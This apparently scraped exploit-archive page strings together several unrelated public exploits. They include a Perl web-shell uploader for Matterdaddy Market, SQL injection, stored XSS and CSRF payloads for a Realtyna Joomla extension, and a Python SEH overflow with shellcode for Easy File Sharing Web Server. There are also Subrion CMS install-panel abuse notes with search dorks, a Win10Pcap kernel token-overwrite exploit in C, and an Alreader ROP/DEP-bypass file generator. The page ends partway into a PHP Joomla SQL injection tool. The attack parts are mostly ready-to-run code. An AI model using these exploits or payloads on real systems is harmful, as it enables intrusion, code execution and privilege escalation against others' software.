source: https://www.securityfocus.com/bid/60150/info
Matterdaddy Market is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to execute arbitrary script code, upload arbitrary files, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Matterdaddy Market 1.4.2 is vulnerable; other version may also be affected.
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
|====================================================|
|= Matterdaddy Market 1.4.2 File Uploader Fuzzer |
|= >> Provided By KedAns-Dz << |
|= e-mail : ked-h[at]hotmail.com |
|====================================================|
INTRO
print "\n";
print "[!] Enter URL(f.e: http://target.com): ";
chomp(my $url=<STDIN>);
print "\n";
print "[!] Enter File Path (f.e: C:\\Shell.php;.gif): "; # File Path For Upload (usage : C:\\Sh3ll.php;.gif)
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/controller.php?op=newItem',
Content_Type => 'multipart/form-data',
Content =>
[
'md_title' => '1337day',
'md_description' => 'Inj3ct0r Exploit Database',
'md_price' => '0',
'md_email2' => 'kedans@pene-test.dz', # put u'r email here !
'city' => 'Hassi Messaoud',
'namer' => 'KedAns-Dz',
'category' => '4',
'filetoupload' => $file,
'filename' => 'k3dsh3ll.php;.jpg',
# to make this exploit as sqli change file name to :
# k3dsh3ll' [+ SQLi +].php.jpg
# use temperdata better ;)
] );
print "\n";
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded!\n"; }
else { print "[!] Check your email and confirm u'r post! \n"; }
} else { print "[-] HTTP request Failed!\n"; }
exit;
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863181645
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Realtyna RPL 8.9.2 Joomla Extension Multiple SQL Injection Vulnerabilities
Vendor: Realtyna LLC
Product web page: https://www.realtyna.com
Affected version: 8.9.2
Summary: Realtyna CRM (Client Relationship Management) Add-on
for RPL is a Real Estate CRM specially designed and developed
based on business process and models required by Real Estate
Agents/Brokers. Realtyna CRM intends to increase the Conversion
Ratio of the website Visitors to Leads and then Leads to Clients.
Desc: Realtyna RPL suffers from multiple SQL Injection vulnerabilities.
Input passed via multiple POST parameters is not properly sanitised
before being returned to the user or used in SQL queries. This can
be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Tested on: Apache
PHP/5.4.38
MySQL/5.5.42-cll
Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
Advisory ID: ZSL-2015-5272
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5272.php
Vendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog
CVE ID: CVE-2015-7714
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7714
05.10.2015
--
http://localhost/administrator/index.php
POST parameters: id, copy_field, pshow, css, tip, cat_id, text_search, plisting, pwizard
Payloads:
- option=com_rpl&view=addon_membership_members&format=edit&id=84'
- option=com_rpl&view=property_structure&format=ajax&function=new_field&id=3004'&type=text
- option=com_rpl&view=rpl_multilingual&format=ajax&function=data_copy©_field=308'©_from=©_to=en_gb©_method=1
- option=com_rpl&view=property_structure&format=ajax&function=update_field&id=3002&options=0&css=&tip=&style=&name=&cat_id=1&text_search=0&plisting=0&pshow=1'&pwizard=1&mode=add
#!/usr/bin/env python
# Easy File Sharing Web Server v7.2 Remote SEH Based Overflow
# The buffer overwrites ebx with 750+ offset, when sending 4059 it overwrites the EBX
# vulnerable file /changeuser.ghp > Cookies UserID=[buf]
# Means there are two ways to exploit changeuser.ghp
# Tested on Win7 x64 and x86, it should work on win8/win10
# By Audit0r
# https://twitter.com/Audit0rSA
import sys, socket, struct
if len(sys.argv) <= 1:
print "Usage: python efsws.py [host] [port]"
exit()
host = sys.argv[1]
port = int(sys.argv[2])
# https://code.google.com/p/win-exec-calc-shellcode/
shellcode = (
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
"\x1c\x39\xbd"
)
print "[+]Connecting to" + host
craftedreq = "A"*4059
craftedreq += "\xeb\x06\x90\x90" # basic SEH jump
craftedreq += struct.pack("<I", 0x10017743) # pop commands from ImageLoad.dll
craftedreq += "\x90"*40 # NOPer
craftedreq += shellcode
craftedreq += "C"*50 # filler
httpreq = (
"GET /changeuser.ghp HTTP/1.1\r\n"
"User-Agent: Mozilla/4.0\r\n"
"Host:" + host + ":" + str(port) + "\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://" + host + "/\r\n"
"Cookie: SESSIONID=6771; UserID=" + craftedreq + "; PassWD=;\r\n"
"Conection: Keep-Alive\r\n\r\n"
)
print "[+]Sending the Calc...."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(httpreq)
s.close()
{-} Title => Subrion 3.X.X - Multiple Exploits
{-} Author => bRpsd (skype: vegnox)
{-} Date Release => 23 October, 2015
{-} Vendor => Subrion
Homepage => http://www.subrion.org/
Download => http://tools.subrion.org/get/latest.zip
Vulnerable Versions => 3.X.X
Tested Version => Latest, 3.3.5 on a Wamp Server.
{x} Google Dork:: 1 => "© 2015 Powered by Subrion CMS"
{x} Google Dork:: 2 => "Powered by Subrion CMS"
--------------------------------------------------------------------------------------------------------------------------------
The installation folder never get deleted or protected unless you deleted it yourself.
Which let any unauthorized user access the installation panel and ruin your website in just a few steps ..
--------------------------------------------------------------------------------------------------------------------------------
#######################################################################################
Vulnerability #1 : Reset Administrator Password & Database settings
Risk: High
File Path: http://localhost/cms/install/install/configuration/
#######################################################################################
#######################################################################################
Vulnerability #2 : Arbitrary File Download + Full Path Disclouser
Risk: Medium
File Path: http://localhost/cms/install/install/download/
Method: POST
Parameter (for file contents) : config_content
#######################################################################################
#######################################################################################
Vulnerability #3 : Unauthorized Arbitrary Plugins Installer
Risk: Medium
File Path: http://localhost/cms/install/install/plugins/
#######################################################################################
** SOLUTION ** ! :
Solution for all vulnerabilities is to delete the file located at:
/install/modules/module.install.php
H@PPY H@CK1NG !
Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities
Vendor: Realtyna LLC
Product web page: https://www.realtyna.com
Affected version: 8.9.2
Summary: Realtyna CRM (Client Relationship Management) Add-on
for RPL is a Real Estate CRM specially designed and developed
based on business process and models required by Real Estate
Agents/Brokers. Realtyna CRM intends to increase the Conversion
Ratio of the website Visitors to Leads and then Leads to Clients.
Desc: The application allows users to perform certain actions
via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site. Multiple cross-site scripting vulnerabilities
were also discovered. The issue is triggered when input passed
via the multiple parameters is not properly sanitized before
being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in
context of an affected site.
Tested on: Apache
PHP/5.4.38
MySQL/5.5.42-cll
Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
Advisory ID: ZSL-2015-5271
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5271.php
Vendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog
CVE ID: CVE-2015-7715
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7715
05.10.2015
--
1. CSRF:
<html lang="en">
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://localhost/administrator/index.php" id="formid" method="post">
<input type="hidden" name="option" value="com_rpl" />
<input type="hidden" name="view" value="addon_membership_members" />
<input type="hidden" name="format" value="ajax" />
<input type="hidden" name="function" value="add_user" />
<input type="hidden" name="id" value="85" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
2. Cross Site Scripting (Stored):
http://localhost/administrator/index.php
POST parameters: new_location_en_gb, new_location_fr_fr
Payloads:
option=com_rpl&view=location_manager&format=ajax&new_location_en_gb=%22onmousemove%3D%22alert(1)%22%22&new_location_fr_fr=&level=1&parent=&function=add_location
option=com_rpl&view=location_manager&format=ajax&new_location_en_gb=&new_location_fr_fr=%22onmousemove%3D%22alert(2)%22%22&level=1&parent=&function=add_location
// Source: https://github.com/Rootkitsmm/Win10Pcap-Exploit
#include <stdio.h>
#include <tchar.h>
#include<Windows.h>
#include<stdio.h>
#include <winternl.h>
#include <intrin.h>
#include <psapi.h>
#include <strsafe.h>
#include <assert.h>
#define SL_IOCTL_GET_EVENT_NAME CTL_CODE(0x8000, 1, METHOD_NEITHER, FILE_ANY_ACCESS)
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
/* found with :
!token
1: kd> dt nt!_OBJECT_HEADER
+0x000 PointerCount : Int4B
+0x004 HandleCount : Int4B
+0x004 NextToFree : Ptr32 Void
+0x008 Lock : _EX_PUSH_LOCK
+0x00c TypeIndex : UChar
+0x00d TraceFlags : UChar
+0x00e InfoMask : UChar
+0x00f Flags : UChar
+0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
+0x010 QuotaBlockCharged : Ptr32 Void
+0x014 SecurityDescriptor : Ptr32 Void
+0x018 Body : _QUAD
TypeIndex is 0x5
*/
#define HANDLE_TYPE_TOKEN 0x5
// Undocumented SYSTEM_INFORMATION_CLASS: SystemHandleInformation
const SYSTEM_INFORMATION_CLASS SystemHandleInformation =
(SYSTEM_INFORMATION_CLASS)16;
// The NtQuerySystemInformation function and the structures that it returns
// are internal to the operating system and subject to change from one
// release of Windows to another. To maintain the compatibility of your
// application, it is better not to use the function.
typedef NTSTATUS (WINAPI * PFN_NTQUERYSYSTEMINFORMATION)(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
);
// Undocumented structure: SYSTEM_HANDLE_INFORMATION
typedef struct _SYSTEM_HANDLE
{
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
// Undocumented FILE_INFORMATION_CLASS: FileNameInformation
const FILE_INFORMATION_CLASS FileNameInformation =
(FILE_INFORMATION_CLASS)9;
// The NtQueryInformationFile function and the structures that it returns
// are internal to the operating system and subject to change from one
// release of Windows to another. To maintain the compatibility of your
// application, it is better not to use the function.
typedef NTSTATUS (WINAPI * PFN_NTQUERYINFORMATIONFILE)(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass
);
// FILE_NAME_INFORMATION contains name of queried file object.
typedef struct _FILE_NAME_INFORMATION {
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;
void* FindTokenAddressHandles(ULONG pid)
{
/////////////////////////////////////////////////////////////////////////
// Prepare for NtQuerySystemInformation and NtQueryInformationFile.
//
// The functions have no associated import library. You must use the
// LoadLibrary and GetProcAddress functions to dynamically link to
// ntdll.dll.
HINSTANCE hNtDll = LoadLibrary(_T("ntdll.dll"));
assert(hNtDll != NULL);
PFN_NTQUERYSYSTEMINFORMATION NtQuerySystemInformation =
(PFN_NTQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll,
"NtQuerySystemInformation");
assert(NtQuerySystemInformation != NULL);
/////////////////////////////////////////////////////////////////////////
// Get system handle information.
//
DWORD nSize = 4096, nReturn;
PSYSTEM_HANDLE_INFORMATION pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION)
HeapAlloc(GetProcessHeap(), 0, nSize);
// NtQuerySystemInformation does not return the correct required buffer
// size if the buffer passed is too small. Instead you must call the
// function while increasing the buffer size until the function no longer
// returns STATUS_INFO_LENGTH_MISMATCH.
while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo,
nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH)
{
HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
nSize += 4096;
pSysHandleInfo = (SYSTEM_HANDLE_INFORMATION*)HeapAlloc(
GetProcessHeap(), 0, nSize);
}
for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
{
PSYSTEM_HANDLE pHandle = &(pSysHandleInfo->Handles[i]);
if (pHandle->ProcessId == pid && pHandle->ObjectTypeNumber == HANDLE_TYPE_TOKEN)
{
printf(" ObjectTypeNumber %d , ProcessId %d , Object %p \r\n",pHandle->ObjectTypeNumber,pHandle->ProcessId,pHandle->Object);
return pHandle->Object;
}
}
/////////////////////////////////////////////////////////////////////////
// Clean up.
//
HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
return 0;
}
void main()
{
DWORD dwBytesReturned;
DWORD ShellcodeFakeMemory;
HANDLE token;
// first create toke handle so find object address with handle
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&token))
DebugBreak();
void* TokenAddress = FindTokenAddressHandles(GetCurrentProcessId());
CloseHandle(token);
// i dont want write fully weaponized exploit so criminal must write code to find "WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3" in runtime ( simple task :)
HANDLE hDriver = CreateFileA("\\\\.\\WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3}",GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(hDriver!=INVALID_HANDLE_VALUE)
{
fprintf(stderr," Open Driver OK\n");
if (!DeviceIoControl(hDriver, SL_IOCTL_GET_EVENT_NAME, NULL,0x80,(void*)((char*)TokenAddress+0x34),NULL,&dwBytesReturned, NULL))
{
fprintf(stderr,"send IOCTL error %d.\n",GetLastError());
return;
}
else fprintf(stderr," Send IOCTL OK\n");
}
else
{
fprintf(stderr," Open Driver error %d.\n",GetLastError());
return;
}
CloseHandle(hDriver);
getchar();
}
#!/usr/bin/env python
#*************************************************************************************************************
# Exploit Title: Alreader 2.5 .fb2 SEH Based Stack Overflow (ASLR and DEP bypass)
# Date: 25.10.2015
# Category: Local Exploit
# Exploit Author: g00dv1n
# Contact: g00dv1n.private@gmail.com
# Version: 2.5
# Tested on: Windows XP SP3 / Windows 7 / Windows 8
# Vendor Homepage: http://www.alreader.com/index.php?lang=en
# Software Link (ENG): http://www.alreader.com/download.php?file=AlReader2.Win32.en.zip
# Software Link (RU): http://www.alreader.com/download.php?file=AlReader2.Win32.ru.zip
# CVE:
# Description:
# Alreader 2.5 its free FB2 reader for Windows.
# FB2 format its just XML. FB2 contain <author> <first-name> </first-name> </author> block.
# Overflow occurs if you create a long name of the author.
# App used WCHAR (1 char - 2 bytes ). If we create file in UTF-8 then app turn every single byte into two.
# For example 41 41 - 00 41 00 41
# So We should use UTF-16.
#
# Also, we can use single null byte in payload.
#
#
#
# Instructions:
# 1. Run this py script for generate AlReader-fb2-PoC-exploit.fb2 file.
# 2. Run Alreader.exe
# 3. Open AlReader-fb2-PoC-exploit.fb2 ( FILE -> Open )
# 4. Enjoy running Calc.exe
#
# Exploit owerview:
# For bypass ALSR I used a ROP style. Main module Alreader2.exe non-ALSR. It also contain calls GetModuleHandleW
# and GetProcAdress. So using this functions I can get pointer to call VirtualProtect to make stack executable and
# run Shellcode.
#
# At overflow overwritten SEH. So we can control EIP. For this spray Jump Adress in payload
# ( It is necessary to adjust the offset in different systems .)
# Then to get control of the stack we need ADD to ESP some value. (ADD ESP, 808h). Then ESP will point to ROP NOP
# ( It is necessary to adjust the offset in different systems .)
# Then the control get ROP chain .
#
# Program have Russian (RU) and English (Eng) versions.
# ROP chains for them the same but different addresses. ( addresses of ADD ESP, 808h and ROP NOP same for all versions )
# For a combination of two versions into one exploit I place two ROP chains one after another.
# For RU version then an exception occurs, control passes first ROP chain. (ADD ESP, 808h RETN 4 then ROP NOPs )
# For Eng version after ADD ESP, 808h RETN 4 and ROP NOPs arises yet another exepiton and Call ADD ESP, 808h.
# So ESP jump over first ROP chain. ROP NOP correct offset and Second ROP chain for Eng version, get control.
# With these tricks, the exploit works correctly for both versions.
#
# Below is ANSI-diagram of the payload:
#
# =-------------------------=
# | gdvn | just fan magic bytes
# |-------------------------|
# | |
# | jmp from SEH adress | x 500 Spray Andress to Jump from oveeride SEH
# | | (ADD ESP, 808h RETN 4)
# |-------------------------|
# | |
# | ROP NOP | x 500 Spray ROP NOP (RETN)
# | |
# |-------------------------|
# | |
# | ROP chain for |
# | RU version |
# | |
# |-------------------------|
# | SHELLCODE | Run Calc.exe
# |-------------------------|
# | |
# | ROP NOP | x 250 Spray ROP NOP (RETN)
# | |
# |-------------------------|
# | |
# | ROP chain for |
# | ENG version |
# | |
# |-------------------------|
# | SHELLCODE | Run Calc.exe
# |-------------------------|
# | |
# | ROP chain for |
# | ENG version |
# | |
# |-------------------------|
# | |
# | |
# | Junk | 'A' x 6000
# | |
# | |
# =-------------------------=
#
#
#
#
#
#**************************************************************************************************************
#######################################################################################################
from struct import *
#######################################################################################################
file_result = "AlReader-fb2-PoC-exploit.fb2"
########################################################################################################
fuz_text = '' # init fuzzy string
jmp_to = pack('<I',0x00442391 ) # 0x00442391 ADD ESP, 808h RETN 4
ret_NOP = pack('<I',0x00448147 ) # RETN
##################################### START CREATE ROP CHAINs ############################################
fuz_text += 'gdvn' # magic init bytes
fuz_text += jmp_to * 500 # spray adr
fuz_text += ret_NOP * 500 # spray RETN adr
####################################### ROP CHAIN FOR RUS VERSION ########################################
# Prepare to call GetModuleHandleW
# EDI = GetModuleHandleW adr
# ESI = ret adr
# EBP = ptr to unicode 'kernel32.dll'
ret_adr_after = pack('<I',0x0048ddd1 ) # 0x0048ddd1 : # ADD ESP,30 # RETN ( this need to correct ESP )
module_handlew_adr = pack('<I',0x004FC8FC ) # 0x004FC8FC GetModuleHandleW adr
kernel32_u = pack('<I',0x0560944 ) # 0x0560944 ptr to unicode 'kernel32.dll'
#0x004904a6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
fuz_text += pack('<I',0x004904a6 ) + module_handlew_adr + ret_adr_after + kernel32_u
fuz_text += '\x41' * 4
fuz_text += pack('<I',0x004f831c ) # 0x004f831c # ADD ESP,24 # RETN
fuz_text += '\x41' * 36
fuz_text += pack('<I',0x004b310d ) # 0x004b310d : # PUSHAD # RETN
fuz_text += '\x41' * 28 # correct after ADD ESP,30
#Junk
#################################################
fuz_text += pack('<I',0x004f831c ) # 0x004f831c # ADD ESP,24 # RETN
fuz_text += '\x41' * 36
#################################################
#EAX = kernel32 base adr
# Prepare to call GetProcAdress
# EDI = GetProcAdress adr
# ESI = ret adr
# EBP = kernel32 base adr
# ESP = ptr to ANSII 'VirtualProtect00'
ret_adr_after = pack('<I',0x0048ddd1 ) # 0x0048ddd1 : # ADD ESP,30 # RETN ( this need to correct ESP )
get_proc_adr = pack('<I',0x0043C8B2 ) # 0x0043C8B2 - GetProcAdress
# 0x004904A8 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
fuz_text += pack('<I',0x004904A8 ) + get_proc_adr + ret_adr_after
fuz_text += '\x41' * 8
fuz_text += pack('<I',0x004b9e9e ) # 0x004b9e9e : # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN
fuz_text += pack('<I',0x004b310d ) # 0x004b310d : # PUSHAD # RETN
fuz_text += 'VirtualProtect' + '\x00'
fuz_text += '\x41' * 17 # correct ESP pointer
########################################################
# Prepare registrs for Virtual protect call
# EDI = ROP NOP
# ESI = VirtualProtect adr
# EBP = Ret adr
# ESP = auto
# EBX = 1
# EDX = 0x40
# ECX = lpOldProtect (ptr to W address)
# Now in EAX VP adr
fuz_text += pack('<I',0x00489cdd ) # 0x00489cdd, # PUSH EAX # POP ESI # RETN
fuz_text += pack('<I',0x004a6392 ) # 0x004a6392, # POP EBX # RETN
fuz_text += pack('<I',0x5DE58BD1 ) # 0x5DE58BD0, # EBX = 5DE58BD1
fuz_text += pack('<I',0x004e7d31 ) # 0x004e7d31, # SUB EBX,5DE58BD0 # RETN # EBX = 1
fuz_text += pack('<I',0x004fc23c ) # 0x004fc23c, # XOR EDX,EDX # RETN # EDX = 0
fuz_text += pack('<I',0x0040db04 ) * 64 # 0x0040db04, # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40
fuz_text += pack('<I',0x0048c064 ) # 0x0048c064, # POP ECX # RETN
fuz_text += pack('<I',0x00629eea ) # 0x00629eea, # &Writable location
fuz_text += pack('<I',0x00487d6a ) # 0x00487d6a, # POP EDI # RETN
fuz_text += pack('<I',0x004f4401 ) # 0x004f4401, # RETN (ROP NOP)
fuz_text += pack('<I',0x004e6379 ) # 0x004e6379, # POP EBP # RETN
ret_adr_after = pack('<I',0x004f831c ) # ret adr # 0x004f831c # ADD ESP,24 # RETN
fuz_text += ret_adr_after
fuz_text+= pack('<I',0x004ecfab ) # 0x004ecfab, # PUSHAD # RETN
fuz_text += '\x41' * 32 # Correct poiter to ESP
fuz_text += pack('<I',0x004a37bd ) # 0x004a37bd : # jmp esp
fuz_text += '\x90' * 16 # NOP's :-)
##################################### END ROP CHAIN #########################################
#############################################################################################
#PASTE SHELLCODE HERE
# Run Calc
shellcode = ("\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7");
fuz_text += shellcode
#############################################################################################
fuz_text += ret_NOP * 250 # spray RETN adr
#############################################################################################
############################### ROP CHAIN FOR ENG VERSION ###################################
# Prepare to call GetModuleHandleW
# EDI = GetModuleHandleW adr
# ESI = ret adr
# EBP = ptr to unicode 'kernel32.dll'
ret_adr_after = pack('<I',0x004cad21 ) # 0x004cad21 : # ADD ESP,30 # RETN ( this need to correct ESP )
module_handlew_adr = pack('<I',0x004FC85C ) # 0x004FC85C GetModuleHandleW adr
kernel32_u = pack('<I',0x00560724 ) # 0x00560724 ptr to unicode 'kernel32.dll'
#0x00488ed6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
fuz_text += pack('<I',0x00488ed6 ) + module_handlew_adr + ret_adr_after + kernel32_u
fuz_text += '\x41' * 4
fuz_text += pack('<I',0x004a8ee8 ) # 0x004a8ee8 # ADD ESP,24 # RETN
fuz_text += '\x41' * 36
fuz_text += pack('<I',0x004b3ded ) # 0x004b3ded : # PUSHAD # RETN
fuz_text += '\x41' * 28 # correct after ADD ESP,30
#Junk
#################################################
fuz_text += pack('<I',0x004a8ee8 ) # 0x004a8ee8 # ADD ESP,24 # RETN
fuz_text += '\x41' * 36
#################################################
#EAX = kernel32 base adr
# Prepare to call GetProcAdress
# EDI = GetProcAdress adr
# ESI = ret adr
# EBP = kernel32 base adr
# ESP = ptr to ANSII 'VirtualProtect00'
ret_adr_after = pack('<I',0x004cad21 ) # 0x004cad21 : # ADD ESP,30 # RETN ( this need to correct ESP )
get_proc_adr = pack('<I',0x0043C8B2 ) # 0x0043C8B2 - GetProcAdress
# 0x00488ed6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
fuz_text += pack('<I',0x00488ed6 ) + get_proc_adr + ret_adr_after
fuz_text += '\x41' * 8
fuz_text += pack('<I',0x004b9dfe ) # 0x004b9dfe : # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN
fuz_text += pack('<I',0x004b3ded ) # 0x004b3ded : # PUSHAD # RETN
fuz_text += 'VirtualProtect' + '\x00'
fuz_text += '\x41' * 17 # correct ESP pointer
########################################################
# Prepare registrs for Virtual protect call
# EDI = ROP NOP
# ESI = VirtualProtect adr
# EBP = Ret adr
# ESP = auto
# EBX = 1
# EDX = 0x40
# ECX = lpOldProtect (ptr to W address)
# Now in EAX VP adr
fuz_text += pack('<I',0x00489c3d ) # 0x00489c3d, # PUSH EAX # POP ESI # RETN
fuz_text += pack('<I',0x00481c40 ) # 0x00481c40, # POP EBX # RETN
fuz_text += pack('<I',0x5DE58BD1 ) # 0x5DE58BD0, # EBX = 5DE58BD1
fuz_text += pack('<I',0x004e7c91 ) # 0x004e7c91, # SUB EBX,5DE58BD0 # RETN # EBX = 1
fuz_text += pack('<I',0x004fc19c ) # 0x004fc19c, # XOR EDX,EDX # RETN
fuz_text += pack('<I',0x0040db04 ) * 64 # 0x0040db04, # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40
fuz_text += pack('<I',0x004f39dc ) # 0x004f39dc, # POP ECX # RETN
fuz_text += pack('<I',0x0062909d ) # 0x0062909d, # &Writable location
fuz_text += pack('<I',0x00495df4 ) # 0x00495df4, # POP EDI # RETN
fuz_text += pack('<I',0x00483a02 ) # 0x00483a02, # RETN (ROP NOP)
fuz_text += pack('<I',0x004fb3c6 ) # 0x004fb3c6, # POP EBP # RETN
ret_adr_after = pack('<I',0x004a8ee8 ) # ret adr # 0x004a8ee8 # ADD ESP,24 # RETN
fuz_text += ret_adr_after
fuz_text+= pack('<I',0x004b3ded ) # 0x004b3ded, # PUSHAD # RETN
fuz_text += '\x41' * 32 # Correct poiter to ESP
fuz_text += pack('<I',0x004757a7 ) # 0x004757a7 : # jmp esp
fuz_text += '\x90' * 16 # NOP's :-)
fuz_text += shellcode
##############################################################################################
fuz_text += '\x41' * 6000 # final junk
################################ GENERATE utf-16 fb2 file ####################################
start = '''
<?xml version="1.0" encoding="unicode-utf_16"?>
<FictionBook xmlns="http://www.gribuser.ru/xml/fictionbook/2.0" xmlns:l="http://www.w3.org/1999/xlink">
<description>
<title-info>
<author>
<first-name>
'''
end = '''
<middle-name/>
<last-name/>
</author>
<book-title>EXPLOIT TEST</book-title>
</title-info>
</description>
</FictionBook>
'''
start_u = start.encode('utf-16')
end_u = end.encode('utf-16')
fout = open(file_result, 'wb')
fout.write(start_u)
fout.close()
fout = open(file_result,'ab')
fout.write(fuz_text)
fout.close()
fout = open(file_result,'ab')
fout.write(end_u)
fout.close()
print "[*] File successfully created !!\n\n"
<?php session_start();
error_reporting(0);
set_time_limit(0);
$head = '
<html>
<head>
<link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/>
</script>
<title>--==[[Mannu joomla SQL Injection exploiter by Team Indishell]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
body {
font-family: Tahoma;
color: white;
background: #444444;
}
input {
border : solid 2px ;
border-color : black;
BACKGROUND-COLOR: #444444;
font: 8pt Verdana;
color: white;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
#t input[type=\'submit\']{
COLOR: White;
border:none;
BACKGROUND-COLOR: black;
}
#t input[type=\'submit\']:hover {
BACKGROUND-COLOR: #ff9933;
color: black;
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 0px ;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 2px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: #191919;;
color: #FFF;
}
textarea {
border : dashed 2px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
A:link {
border: 1px;
COLOR: red; TEXT-DECORATION: none
}
A:visited {
COLOR: red; TEXT-DECORATION: none
}
A:hover {
color: White; TEXT-DECORATION: none
}
A:active {
color: white; TEXT-DECORATION: none
}
</STYLE>
<script type="text/javascript">
<!--
function lhook(id) {
var e = document.getElementById(id);
